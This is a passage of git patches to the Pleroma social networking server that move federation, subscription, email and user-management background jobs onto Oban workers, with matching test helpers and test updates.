- PleromaJobQueue.enqueue(:federator_outgoing, __MODULE__, [:verify_websub, websub])
+ %{"op" => "verify_websub", "websub_id" => websub.id}
+ |> SubscriberWorker.new(worker_args(:federator_outgoing))
+ |> Pleroma.Repo.insert()
end
- def request_subscription(sub) do
- PleromaJobQueue.enqueue(:federator_outgoing, __MODULE__, [:request_subscription, sub])
+ def request_subscription(websub) do
+ %{"op" => "request_subscription", "websub_id" => websub.id}
+ |> SubscriberWorker.new(worker_args(:federator_outgoing))
+ |> Pleroma.Repo.insert()
end
- def refresh_subscriptions do
- PleromaJobQueue.enqueue(:federator_outgoing, __MODULE__, [:refresh_subscriptions])
+ def refresh_subscriptions(worker_args \\ []) do
+ %{"op" => "refresh_subscriptions"}
+ |> SubscriberWorker.new(worker_args ++ [max_attempts: 1] ++ worker_args(:federator_outgoing))
+ |> Pleroma.Repo.insert()
end
- # Job Worker Callbacks
-
- def perform(:refresh_subscriptions) do
- Logger.debug("Federator running refresh subscriptions")
- Websub.refresh_subscriptions()
-
- spawn(fn ->
- # 6 hours
- Process.sleep(1000 * 60 * 60 * 6)
- refresh_subscriptions()
- end)
- end
-
- def perform(:request_subscription, websub) do
- Logger.debug("Refreshing #{websub.topic}")
-
- with {:ok, websub} <- Websub.request_subscription(websub) do
- Logger.debug("Successfully refreshed #{websub.topic}")
+ defp worker_args(queue) do
+ if max_attempts = Pleroma.Config.get([:workers, :retries, queue]) do
+ [max_attempts: max_attempts]
else
- _e -> Logger.debug("Couldn't refresh #{websub.topic}")
- end
- end
-
- def perform(:publish, activity) do
- Logger.debug(fn -> "Running publish for #{activity.data["id"]}" end)
-
- with %User{} = actor <- User.get_cached_by_ap_id(activity.data["actor"]),
- {:ok, actor} <- User.ensure_keys_present(actor) do
- Publisher.publish(actor, activity)
- end
- end
-
- def perform(:verify_websub, websub) do
- Logger.debug(fn ->
- "Running WebSub verification for #{websub.id} (#{websub.topic}, #{websub.callback})"
- end)
-
- Websub.verify(websub)
- end
-
- def perform(:incoming_doc, doc) do
- Logger.info("Got document, trying to parse")
- OStatus.handle_incoming(doc)
- end
-
- def perform(:incoming_ap_doc, params) do
- Logger.info("Handling incoming AP activity")
-
- params = Utils.normalize_params(params)
-
- # NOTE: we use the actor ID to do the containment, this is fine because an
- # actor shouldn't be acting on objects outside their own AP server.
- with {:ok, _user} <- ap_enabled_actor(params["actor"]),
- nil <- Activity.normalize(params["id"]),
- :ok <- Containment.contain_origin_from_id(params["actor"], params),
- {:ok, activity} <- Transmogrifier.handle_incoming(params) do
- {:ok, activity}
- else
- %Activity{} ->
- Logger.info("Already had #{params["id"]}")
- :error
-
- _e ->
- # Just drop those for now
- Logger.info("Unhandled activity")
- Logger.info(Jason.encode!(params, pretty: true))
- :error
- end
- end
-
- def perform(type, _) do
- Logger.debug(fn -> "Unknown task: #{type}" end)
- {:error, "Don't know what to do with this"}
- end
-
- def ap_enabled_actor(id) do
- user = User.get_cached_by_ap_id(id)
-
- if User.ap_enabled?(user) do
- {:ok, user}
- else
- ActivityPub.make_user_from_ap_id(id)
+ []
end
end
end
diff --git a/lib/pleroma/web/federator/publisher.ex b/lib/pleroma/web/federator/publisher.ex
index e8c1bf17f..05d2be615 100644
--- a/lib/pleroma/web/federator/publisher.ex
+++ b/lib/pleroma/web/federator/publisher.ex
@@ -6,6 +6,7 @@ defmodule Pleroma.Web.Federator.Publisher do
alias Pleroma.Activity
alias Pleroma.Config
alias Pleroma.User
+ alias Pleroma.Workers.Publisher, as: PublisherWorker
require Logger
@@ -30,8 +31,15 @@ defmodule Pleroma.Web.Federator.Publisher do
"""
@spec enqueue_one(module(), Map.t()) :: :ok
def enqueue_one(module, %{} = params) do
- %{module: to_string(module), params: params}
- |> Pleroma.Workers.Publisher.new()
+ worker_args =
+ if max_attempts = Pleroma.Config.get([:workers, :retries, :federator_outgoing]) do
+ [max_attempts: max_attempts]
+ else
+ []
+ end
+
+ %{"op" => "publish_one", "module" => to_string(module), "params" => params}
+ |> PublisherWorker.new(worker_args)
|> Pleroma.Repo.insert()
end
diff --git a/lib/pleroma/workers/publisher.ex b/lib/pleroma/workers/publisher.ex
index 639794830..67871977a 100644
--- a/lib/pleroma/workers/publisher.ex
+++ b/lib/pleroma/workers/publisher.ex
@@ -3,12 +3,33 @@
# SPDX-License-Identifier: AGPL-3.0-only
defmodule Pleroma.Workers.Publisher do
- use Oban.Worker, queue: "federator_outgoing", max_attempts: 5
+ alias Pleroma.Activity
+ alias Pleroma.User
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "federator_outgoing",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
@impl Oban.Worker
- def perform(%Oban.Job{args: %{module: module_name, params: params}}) do
+ def perform(%{"op" => "publish", "activity_id" => activity_id}) do
+ with %Activity{} = activity <- Activity.get_by_id(activity_id) do
+ perform_publish(activity)
+ else
+ _ -> raise "Non-existing activity: #{activity_id}"
+ end
+ end
+
+ def perform(%{"op" => "publish_one", "module" => module_name, "params" => params}) do
module_name
|> String.to_atom()
|> apply(:publish_one, [params])
end
+
+ def perform_publish(%Activity{} = activity) do
+ with %User{} = actor <- User.get_cached_by_ap_id(activity.data["actor"]),
+ {:ok, actor} <- User.ensure_keys_present(actor) do
+ Pleroma.Web.Federator.Publisher.publish(actor, activity)
+ end
+ end
end
diff --git a/lib/pleroma/workers/receiver.ex b/lib/pleroma/workers/receiver.ex
new file mode 100644
index 000000000..43558b4e6
--- /dev/null
+++ b/lib/pleroma/workers/receiver.ex
@@ -0,0 +1,61 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Receiver do
+ alias Pleroma.Activity
+ alias Pleroma.Object.Containment
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.ActivityPub
+ alias Pleroma.Web.ActivityPub.Transmogrifier
+ alias Pleroma.Web.ActivityPub.Utils
+ alias Pleroma.Web.OStatus
+
+ require Logger
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "federator_incoming",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "incoming_doc", "body" => doc}) do
+ Logger.info("Got incoming document, trying to parse")
+ OStatus.handle_incoming(doc)
+ end
+
+ def perform(%{"op" => "incoming_ap_doc", "params" => params}) do
+ Logger.info("Handling incoming AP activity")
+
+ params = Utils.normalize_params(params)
+
+ # NOTE: we use the actor ID to do the containment, this is fine because an
+ # actor shouldn't be acting on objects outside their own AP server.
+ with {:ok, _user} <- ap_enabled_actor(params["actor"]),
+ nil <- Activity.normalize(params["id"]),
+ :ok <- Containment.contain_origin_from_id(params["actor"], params),
+ {:ok, activity} <- Transmogrifier.handle_incoming(params) do
+ {:ok, activity}
+ else
+ %Activity{} ->
+ Logger.info("Already had #{params["id"]}")
+ :error
+
+ _e ->
+ # Just drop those for now
+ Logger.info("Unhandled activity")
+ Logger.info(Jason.encode!(params, pretty: true))
+ :error
+ end
+ end
+
+ defp ap_enabled_actor(id) do
+ user = User.get_cached_by_ap_id(id)
+
+ if User.ap_enabled?(user) do
+ {:ok, user}
+ else
+ ActivityPub.make_user_from_ap_id(id)
+ end
+ end
+end
diff --git a/lib/pleroma/workers/subscriber.ex b/lib/pleroma/workers/subscriber.ex
new file mode 100644
index 000000000..a8c01bb10
--- /dev/null
+++ b/lib/pleroma/workers/subscriber.ex
@@ -0,0 +1,44 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Workers.Subscriber do
+ alias Pleroma.Repo
+ alias Pleroma.Web.Websub
+ alias Pleroma.Web.Websub.WebsubClientSubscription
+
+ require Logger
+
+ # Note: `max_attempts` is intended to be overridden in `new/1` call
+ use Oban.Worker,
+ queue: "federator_outgoing",
+ max_attempts: Pleroma.Config.get([:workers, :retries, :compile_time_default])
+
+ @impl Oban.Worker
+ def perform(%{"op" => "refresh_subscriptions"}) do
+ Websub.refresh_subscriptions()
+ # Schedule the next run in 6 hours
+ Pleroma.Web.Federator.refresh_subscriptions(schedule_in: 3600 * 6)
+ end
+
+ def perform(%{"op" => "request_subscription", "websub_id" => websub_id}) do
+ websub = Repo.get(WebsubClientSubscription, websub_id)
+ Logger.debug("Refreshing #{websub.topic}")
+
+ with {:ok, websub} <- Websub.request_subscription(websub) do
+ Logger.debug("Successfully refreshed #{websub.topic}")
+ else
+ _e -> Logger.debug("Couldn't refresh #{websub.topic}")
+ end
+ end
+
+ def perform(%{"op" => "verify_websub", "websub_id" => websub_id}) do
+ websub = Repo.get(WebsubClientSubscription, websub_id)
+
+ Logger.debug(fn ->
+ "Running WebSub verification for #{websub.id} (#{websub.topic}, #{websub.callback})"
+ end)
+
+ Websub.verify(websub)
+ end
+end
diff --git a/test/activity_test.exs b/test/activity_test.exs
index b27f6fd36..b9c12adb2 100644
--- a/test/activity_test.exs
+++ b/test/activity_test.exs
@@ -6,6 +6,7 @@ defmodule Pleroma.ActivityTest do
use Pleroma.DataCase
alias Pleroma.Activity
alias Pleroma.Bookmark
+ alias Pleroma.ObanHelpers
alias Pleroma.Object
alias Pleroma.ThreadMute
import Pleroma.Factory
@@ -125,7 +126,8 @@ test "when association is not loaded" do
}
{:ok, local_activity} = Pleroma.Web.CommonAPI.post(user, %{"status" => "find me!"})
- {:ok, remote_activity} = Pleroma.Web.Federator.incoming_ap_doc(params)
+ {:ok, job} = Pleroma.Web.Federator.incoming_ap_doc(params)
+ {:ok, remote_activity} = ObanHelpers.perform(job)
%{local_activity: local_activity, remote_activity: remote_activity, user: user}
end
diff --git a/test/support/oban_helpers.ex b/test/support/oban_helpers.ex
new file mode 100644
index 000000000..54b5a9566
--- /dev/null
+++ b/test/support/oban_helpers.ex
@@ -0,0 +1,36 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2018 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.ObanHelpers do
+ @moduledoc """
+ Oban test helpers.
+ """
+
+ alias Pleroma.Repo
+
+ def perform(%Oban.Job{} = job) do
+ res = apply(String.to_existing_atom("Elixir." <> job.worker), :perform, [job])
+ Repo.delete(job)
+ res
+ end
+
+ def perform(jobs) when is_list(jobs) do
+ for job <- jobs, do: perform(job)
+ end
+
+ def member?(%{} = job_args, jobs) when is_list(jobs) do
+ Enum.any?(jobs, fn job ->
+ member?(job_args, job.args)
+ end)
+ end
+
+ def member?(%{} = test_attrs, %{} = attrs) do
+ Enum.all?(
+ test_attrs,
+ fn {k, _v} -> member?(test_attrs[k], attrs[k]) end
+ )
+ end
+
+ def member?(x, y), do: x == y
+end
diff --git a/test/user_test.exs b/test/user_test.exs
index 70c376384..ee6d8e8f3 100644
--- a/test/user_test.exs
+++ b/test/user_test.exs
@@ -5,6 +5,7 @@
defmodule Pleroma.UserTest do
alias Pleroma.Activity
alias Pleroma.Builders.UserBuilder
+ alias Pleroma.ObanHelpers
alias Pleroma.Object
alias Pleroma.Repo
alias Pleroma.User
@@ -1044,8 +1045,16 @@ test "it sends out User Delete activity", %{user: user} do
{:ok, _user} = User.delete(user)
- assert [%{args: %{"params" => %{"inbox" => "http://mastodon.example.org/inbox"}}}] =
+ assert ObanHelpers.member?(
+ %{
+ "op" => "publish_one",
+ "params" => %{
+ "inbox" => "http://mastodon.example.org/inbox",
+ "id" => "pleroma:fakeid"
+ }
+ },
all_enqueued(worker: Pleroma.Workers.Publisher)
+ )
Pleroma.Config.put(config_path, initial_setting)
end
diff --git a/test/web/activity_pub/activity_pub_controller_test.exs b/test/web/activity_pub/activity_pub_controller_test.exs
index 40344f17e..1d809164f 100644
--- a/test/web/activity_pub/activity_pub_controller_test.exs
+++ b/test/web/activity_pub/activity_pub_controller_test.exs
@@ -4,15 +4,19 @@
defmodule Pleroma.Web.ActivityPub.ActivityPubControllerTest do
use Pleroma.Web.ConnCase
+ use Oban.Testing, repo: Pleroma.Repo
+
import Pleroma.Factory
alias Pleroma.Activity
alias Pleroma.Instances
+ alias Pleroma.ObanHelpers
alias Pleroma.Object
alias Pleroma.User
alias Pleroma.Web.ActivityPub.ObjectView
alias Pleroma.Web.ActivityPub.UserView
alias Pleroma.Web.ActivityPub.Utils
alias Pleroma.Web.CommonAPI
+ alias Pleroma.Workers.Receiver, as: ReceiverWorker
setup_all do
Tesla.Mock.mock_global(fn env -> apply(HttpRequestMock, :request, [env]) end)
@@ -232,7 +236,8 @@ test "it inserts an incoming activity into the database", %{conn: conn} do
|> post("/inbox", data)
assert "ok" == json_response(conn, 200)
- :timer.sleep(500)
+
+ ObanHelpers.perform(all_enqueued(worker: ReceiverWorker))
assert Activity.get_by_ap_id(data["id"])
end
@@ -274,7 +279,7 @@ test "it inserts an incoming activity into the database", %{conn: conn, data: da
|> post("/users/#{user.nickname}/inbox", data)
assert "ok" == json_response(conn, 200)
- :timer.sleep(500)
+ ObanHelpers.perform(all_enqueued(worker: ReceiverWorker))
assert Activity.get_by_ap_id(data["id"])
end
@@ -303,7 +308,7 @@ test "it accepts messages from actors that are followed by the user", %{
|> post("/users/#{recipient.nickname}/inbox", data)
assert "ok" == json_response(conn, 200)
- :timer.sleep(500)
+ ObanHelpers.perform(all_enqueued(worker: ReceiverWorker))
assert Activity.get_by_ap_id(data["id"])
end
@@ -382,6 +387,8 @@ test "it removes all follower collections but actor's", %{conn: conn} do
|> post("/users/#{recipient.nickname}/inbox", data)
|> json_response(200)
+ ObanHelpers.perform(all_enqueued(worker: ReceiverWorker))
+
activity = Activity.get_by_ap_id(data["id"])
assert activity.id
@@ -457,6 +464,7 @@ test "it inserts an incoming create activity into the database", %{conn: conn} d
|> post("/users/#{user.nickname}/outbox", data)
result = json_response(conn, 201)
+
assert Activity.get_by_ap_id(result["id"])
end
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index 5c1704548..ebe962da2 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -4,8 +4,10 @@
defmodule Pleroma.Web.FederatorTest do
alias Pleroma.Instances
+ alias Pleroma.ObanHelpers
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Federator
+ alias Pleroma.Workers.Publisher, as: PublisherWorker
use Pleroma.DataCase
use Oban.Testing, repo: Pleroma.Repo
@@ -45,6 +47,7 @@ test "with relays active, it publishes to the relay", %{
} do
with_mocks([relay_mock]) do
Federator.publish(activity)
+ ObanHelpers.perform(all_enqueued(worker: PublisherWorker))
end
assert_received :relay_publish
@@ -58,6 +61,7 @@ test "with relays deactivated, it does not publish to the relay", %{
with_mocks([relay_mock]) do
Federator.publish(activity)
+ ObanHelpers.perform(all_enqueued(worker: PublisherWorker))
end
refute_received :relay_publish
@@ -97,8 +101,15 @@ test "it federates only to reachable instances via AP" do
expected_dt = NaiveDateTime.to_iso8601(dt)
- assert [%{args: %{"params" => %{"inbox" => ^inbox1, "unreachable_since" => ^expected_dt}}}] =
- all_enqueued(worker: Pleroma.Workers.Publisher)
+ ObanHelpers.perform(all_enqueued(worker: PublisherWorker))
+
+ assert ObanHelpers.member?(
+ %{
+ "op" => "publish_one",
+ "params" => %{"inbox" => inbox1, "unreachable_since" => expected_dt}
+ },
+ all_enqueued(worker: PublisherWorker)
+ )
end
test "it federates only to reachable instances via Websub" do
@@ -129,16 +140,18 @@ test "it federates only to reachable instances via Websub" do
expected_callback = sub2.callback
expected_dt = NaiveDateTime.to_iso8601(dt)
- assert [
+ ObanHelpers.perform(all_enqueued(worker: PublisherWorker))
+
+ assert ObanHelpers.member?(
%{
- args: %{
- "params" => %{
- "callback" => ^expected_callback,
- "unreachable_since" => ^expected_dt
- }
+ "op" => "publish_one",
+ "params" => %{
+ "callback" => expected_callback,
+ "unreachable_since" => expected_dt
}
- }
- ] = all_enqueued(worker: Pleroma.Workers.Publisher)
+ },
+ all_enqueued(worker: PublisherWorker)
+ )
end
test "it federates only to reachable instances via Salmon" do
@@ -172,16 +185,18 @@ test "it federates only to reachable instances via Salmon" do
expected_dt = NaiveDateTime.to_iso8601(dt)
- assert [
+ ObanHelpers.perform(all_enqueued(worker: PublisherWorker))
+
+ assert ObanHelpers.member?(
%{
- args: %{
- "params" => %{
- "recipient_id" => ^remote_user2_id,
- "unreachable_since" => ^expected_dt
- }
+ "op" => "publish_one",
+ "params" => %{
+ "recipient_id" => remote_user2_id,
+ "unreachable_since" => expected_dt
}
- }
- ] = all_enqueued(worker: Pleroma.Workers.Publisher)
+ },
+ all_enqueued(worker: PublisherWorker)
+ )
end
end
@@ -201,7 +216,8 @@ test "successfully processes incoming AP docs with correct origin" do
"to" => ["https://www.w3.org/ns/activitystreams#Public"]
}
- {:ok, _activity} = Federator.incoming_ap_doc(params)
+ assert {:ok, job} = Federator.incoming_ap_doc(params)
+ assert {:ok, _activity} = ObanHelpers.perform(job)
end
test "rejects incoming AP docs with incorrect origin" do
@@ -219,7 +235,8 @@ test "rejects incoming AP docs with incorrect origin" do
"to" => ["https://www.w3.org/ns/activitystreams#Public"]
}
- :error = Federator.incoming_ap_doc(params)
+ assert {:ok, job} = Federator.incoming_ap_doc(params)
+ assert :error = ObanHelpers.perform(job)
end
end
end
diff --git a/test/web/websub/websub_test.exs b/test/web/websub/websub_test.exs
index 74386d7db..b704a558a 100644
--- a/test/web/websub/websub_test.exs
+++ b/test/web/websub/websub_test.exs
@@ -4,11 +4,14 @@
defmodule Pleroma.Web.WebsubTest do
use Pleroma.DataCase
+ use Oban.Testing, repo: Pleroma.Repo
+ alias Pleroma.ObanHelpers
alias Pleroma.Web.Router.Helpers
alias Pleroma.Web.Websub
alias Pleroma.Web.Websub.WebsubClientSubscription
alias Pleroma.Web.Websub.WebsubServerSubscription
+ alias Pleroma.Workers.Subscriber, as: SubscriberWorker
import Pleroma.Factory
import Tesla.Mock
@@ -224,6 +227,7 @@ test "it renews subscriptions that have less than a day of time left" do
})
_refresh = Websub.refresh_subscriptions()
+ ObanHelpers.perform(all_enqueued(worker: SubscriberWorker))
assert still_good == Repo.get(WebsubClientSubscription, still_good.id)
refute needs_refresh == Repo.get(WebsubClientSubscription, needs_refresh.id)
From 33a5fc4a70b6f9b8c2d8c03a412d7eec8d5b3db1 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Sat, 10 Aug 2019 20:38:31 +0300
Subject: [PATCH 003/272] [#1149] Fixed failing tests. Ensured
Instance.set_unreachable/2 supports ISO 8601 datetime.
---
lib/pleroma/digest_email_worker.ex | 4 +---
lib/pleroma/instances/instance.ex | 8 +++++++-
test/conversation_test.exs | 2 ++
test/support/oban_helpers.ex | 6 ++++++
test/web/federator_test.exs | 3 ++-
test/web/instances/instance_test.exs | 3 ++-
6 files changed, 20 insertions(+), 6 deletions(-)
diff --git a/lib/pleroma/digest_email_worker.ex b/lib/pleroma/digest_email_worker.ex
index 18e67d39b..3b0e2bca6 100644
--- a/lib/pleroma/digest_email_worker.ex
+++ b/lib/pleroma/digest_email_worker.ex
@@ -1,8 +1,6 @@
defmodule Pleroma.DigestEmailWorker do
import Ecto.Query
- @queue_name :digest_emails
-
def perform do
config = Pleroma.Config.get([:email_notifications, :digest])
negative_interval = -Map.fetch!(config, :interval)
@@ -17,7 +15,7 @@ def perform do
select: u
)
|> Pleroma.Repo.all()
- |> Enum.each(&PleromaJobQueue.enqueue(@queue_name, __MODULE__, [&1]))
+ |> Enum.each(&PleromaJobQueue.enqueue(:digest_emails, __MODULE__, [&1]))
end
@doc """
diff --git a/lib/pleroma/instances/instance.ex b/lib/pleroma/instances/instance.ex
index 4d7ed4ca1..544c4b687 100644
--- a/lib/pleroma/instances/instance.ex
+++ b/lib/pleroma/instances/instance.ex
@@ -90,7 +90,7 @@ def set_reachable(_), do: {:error, nil}
def set_unreachable(url_or_host, unreachable_since \\ nil)
def set_unreachable(url_or_host, unreachable_since) when is_binary(url_or_host) do
- unreachable_since = unreachable_since || DateTime.utc_now()
+ unreachable_since = parse_datetime(unreachable_since) || NaiveDateTime.utc_now()
host = host(url_or_host)
existing_record = Repo.get_by(Instance, %{host: host})
@@ -114,4 +114,10 @@ def set_unreachable(url_or_host, unreachable_since) when is_binary(url_or_host)
end
def set_unreachable(_, _), do: {:error, nil}
+
+ defp parse_datetime(datetime) when is_binary(datetime) do
+ NaiveDateTime.from_iso8601(datetime)
+ end
+
+ defp parse_datetime(datetime), do: datetime
end
diff --git a/test/conversation_test.exs b/test/conversation_test.exs
index aa193e0d4..2ebbcab76 100644
--- a/test/conversation_test.exs
+++ b/test/conversation_test.exs
@@ -28,6 +28,8 @@ test "it goes through old direct conversations" do
{:ok, _activity} =
CommonAPI.post(user, %{"visibility" => "direct", "status" => "hey @#{other_user.nickname}"})
+ Pleroma.ObanHelpers.perform_all()
+
Repo.delete_all(Conversation)
Repo.delete_all(Conversation.Participation)
diff --git a/test/support/oban_helpers.ex b/test/support/oban_helpers.ex
index 54b5a9566..ecc03ba1a 100644
--- a/test/support/oban_helpers.ex
+++ b/test/support/oban_helpers.ex
@@ -9,6 +9,12 @@ defmodule Pleroma.ObanHelpers do
alias Pleroma.Repo
+ def perform_all do
+ Oban.Job
+ |> Repo.all()
+ |> perform()
+ end
+
def perform(%Oban.Job{} = job) do
res = apply(String.to_existing_atom("Elixir." <> job.worker), :perform, [job])
Repo.delete(job)
diff --git a/test/web/federator_test.exs b/test/web/federator_test.exs
index d3a28d50e..e0be4342b 100644
--- a/test/web/federator_test.exs
+++ b/test/web/federator_test.exs
@@ -249,7 +249,8 @@ test "it does not crash if MRF rejects the post" do
File.read!("test/fixtures/mastodon-post-activity.json")
|> Poison.decode!()
- assert Federator.incoming_ap_doc(params) == :error
+ assert {:ok, job} = Federator.incoming_ap_doc(params)
+ assert :error = ObanHelpers.perform(job)
Pleroma.Config.put([:instance, :rewrite_policy], policies)
Pleroma.Config.put(:mrf_keyword, mrf_keyword_policy)
diff --git a/test/web/instances/instance_test.exs b/test/web/instances/instance_test.exs
index d28730994..a1bdd45d3 100644
--- a/test/web/instances/instance_test.exs
+++ b/test/web/instances/instance_test.exs
@@ -22,7 +22,8 @@ defmodule Pleroma.Instances.InstanceTest do
describe "set_reachable/1" do
test "clears `unreachable_since` of existing matching Instance record having non-nil `unreachable_since`" do
- instance = insert(:instance, unreachable_since: NaiveDateTime.utc_now())
+ unreachable_since = NaiveDateTime.to_iso8601(NaiveDateTime.utc_now())
+ instance = insert(:instance, unreachable_since: unreachable_since)
assert {:ok, instance} = Instance.set_reachable(instance.host)
refute instance.unreachable_since
From 0e1c481a94392b69833fbe6afc184ebbd90e1330 Mon Sep 17 00:00:00 2001
From: Ivan Tashkinov
Date: Tue, 13 Aug 2019 20:20:26 +0300
Subject: [PATCH 004/272] [#1149] Added more oban workers. Refactoring.
---
lib/pleroma/digest_email_worker.ex | 11 ++-
lib/pleroma/scheduled_activity_worker.ex | 8 +-
lib/pleroma/user.ex | 55 +++++++----
lib/pleroma/web/activity_pub/activity_pub.ex | 7 +-
.../mrf/mediaproxy_warming_policy.ex | 12 ++-
.../web/activity_pub/transmogrifier.ex | 7 +-
lib/pleroma/web/federator/federator.ex | 98 ++++++++++++++++++-
lib/pleroma/web/oauth/token/clean_worker.ex | 10 +-
lib/pleroma/web/push/push.ex | 12 ++-
.../controllers/util_controller.ex | 14 +--
lib/pleroma/workers/background_worker.ex | 66 +++++++++++++
lib/pleroma/workers/helper.ex | 13 +++
lib/pleroma/workers/mailer.ex | 18 ++++
lib/pleroma/workers/publisher.ex | 20 +---
lib/pleroma/workers/receiver.ex | 46 +--------
.../workers/scheduled_activity_worker.ex | 15 +++
lib/pleroma/workers/subscriber.ex | 23 +----
lib/pleroma/workers/transmogrifier.ex | 18 ++++
lib/pleroma/workers/web_pusher.ex | 19 ++++
test/activity_test.exs | 2 +-
test/conversation_test.exs | 2 +-
test/notification_test.exs | 5 +-
test/support/oban_helpers.ex | 2 +-
test/user_test.exs | 19 ++--
.../activity_pub_controller_test.exs | 2 +-
.../mrf/mediaproxy_warming_policy_test.exs | 6 ++
test/web/activity_pub/transmogrifier_test.exs | 4 +
test/web/federator_test.exs | 2 +-
test/web/twitter_api/util_controller_test.exs | 43 ++++----
test/web/websub/websub_test.exs | 2 +-
30 files changed, 402 insertions(+), 159 deletions(-)
create mode 100644 lib/pleroma/workers/background_worker.ex
create mode 100644 lib/pleroma/workers/helper.ex
create mode 100644 lib/pleroma/workers/mailer.ex
create mode 100644 lib/pleroma/workers/scheduled_activity_worker.ex
create mode 100644 lib/pleroma/workers/transmogrifier.ex
create mode 100644 lib/pleroma/workers/web_pusher.ex
diff --git a/lib/pleroma/digest_email_worker.ex b/lib/pleroma/digest_email_worker.ex
index 3b0e2bca6..6e44cc955 100644
--- a/lib/pleroma/digest_email_worker.ex
+++ b/lib/pleroma/digest_email_worker.ex
@@ -1,6 +1,11 @@
defmodule Pleroma.DigestEmailWorker do
+ alias Pleroma.Repo
+ alias Pleroma.Workers.Mailer, as: MailerWorker
+
import Ecto.Query
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
def perform do
config = Pleroma.Config.get([:email_notifications, :digest])
negative_interval = -Map.fetch!(config, :interval)
@@ -15,7 +20,11 @@ def perform do
select: u
)
|> Pleroma.Repo.all()
- |> Enum.each(&PleromaJobQueue.enqueue(:digest_emails, __MODULE__, [&1]))
+ |> Enum.each(fn user ->
+ %{"op" => "digest_email", "user_id" => user.id}
+ |> MailerWorker.new([queue: "digest_emails"] ++ worker_args(:digest_emails))
+ |> Repo.insert()
+ end)
end
@doc """
diff --git a/lib/pleroma/scheduled_activity_worker.ex b/lib/pleroma/scheduled_activity_worker.ex
index 65b38622f..cabea51ca 100644
--- a/lib/pleroma/scheduled_activity_worker.ex
+++ b/lib/pleroma/scheduled_activity_worker.ex
@@ -8,14 +8,18 @@ defmodule Pleroma.ScheduledActivityWorker do
"""
alias Pleroma.Config
+ alias Pleroma.Repo
alias Pleroma.ScheduledActivity
alias Pleroma.User
alias Pleroma.Web.CommonAPI
+
use GenServer
require Logger
@schedule_interval :timer.minutes(1)
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
def start_link do
GenServer.start_link(__MODULE__, nil)
end
@@ -45,7 +49,9 @@ def perform(:execute, scheduled_activity_id) do
def handle_info(:perform, state) do
ScheduledActivity.due_activities(@schedule_interval)
|> Enum.each(fn scheduled_activity ->
- PleromaJobQueue.enqueue(:scheduled_activities, __MODULE__, [:execute, scheduled_activity.id])
+ %{"op" => "execute", "activity_id" => scheduled_activity.id}
+ |> Pleroma.Workers.ScheduledActivityWorker.new(worker_args(:scheduled_activities))
+ |> Repo.insert()
end)
schedule_next()
diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
index 7d18f099e..bc2102ca7 100644
--- a/lib/pleroma/user.ex
+++ b/lib/pleroma/user.ex
@@ -26,6 +26,7 @@ defmodule Pleroma.User do
alias Pleroma.Web.OStatus
alias Pleroma.Web.RelMe
alias Pleroma.Web.Websub
+ alias Pleroma.Workers.BackgroundWorker
require Logger
@@ -39,6 +40,8 @@ defmodule Pleroma.User do
@strict_local_nickname_regex ~r/^[a-zA-Z\d]+$/
@extended_local_nickname_regex ~r/^[a-zA-Z\d_-]+$/
+ defdelegate worker_args(queue), to: Pleroma.Workers.Helper
+
schema "users" do
field(:bio, :string)
field(:email, :string)
@@ -579,8 +582,11 @@ def get_or_fetch_by_nickname(nickname) do
end
@doc "Fetch some posts when the user has just been federated with"
- def fetch_initial_posts(user),
- do: PleromaJobQueue.enqueue(:background, __MODULE__, [:fetch_initial_posts, user])
+ def fetch_initial_posts(user) do
+ %{"op" => "fetch_initial_posts", "user_id" => user.id}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
+ end
@spec get_followers_query(User.t(), pos_integer() | nil) :: Ecto.Query.t()
def get_followers_query(%User{} = user, nil) do
@@ -1001,7 +1007,9 @@ def unblock_domain(user, domain) do
end
def deactivate_async(user, status \\ true) do
- PleromaJobQueue.enqueue(:background, __MODULE__, [:deactivate_async, user, status])
+ %{"op" => "deactivate_user", "user_id" => user.id, "status" => status}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
end
def deactivate(%User{} = user, status \\ true) do
@@ -1029,9 +1037,11 @@ def update_notification_settings(%User{} = user, settings \\ %{}) do
|> update_and_set_cache()
end
- @spec delete(User.t()) :: :ok
- def delete(%User{} = user),
- do: PleromaJobQueue.enqueue(:background, __MODULE__, [:delete, user])
+ def delete(%User{} = user) do
+ %{"op" => "delete_user", "user_id" => user.id}
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
+ end
@spec perform(atom(), User.t()) :: {:ok, User.t()}
def perform(:delete, %User{} = user) do
@@ -1138,21 +1148,26 @@ def external_users(opts \\ []) do
Repo.all(query)
end
- def blocks_import(%User{} = blocker, blocked_identifiers) when is_list(blocked_identifiers),
- do:
- PleromaJobQueue.enqueue(:background, __MODULE__, [
- :blocks_import,
- blocker,
- blocked_identifiers
- ])
+ def blocks_import(%User{} = blocker, blocked_identifiers) when is_list(blocked_identifiers) do
+ %{
+ "op" => "blocks_import",
+ "blocker_id" => blocker.id,
+ "blocked_identifiers" => blocked_identifiers
+ }
+ |> BackgroundWorker.new(worker_args(:background))
+ |> Repo.insert()
+ end
- def follow_import(%User{} = follower, followed_identifiers) when is_list(followed_identifiers),
- do:
- PleromaJobQueue.enqueue(:background, __MODULE__, [
- :follow_import,
- follower,
- followed_identifiers
- ])
+ def follow_import(%User{} = follower, followed_identifiers)
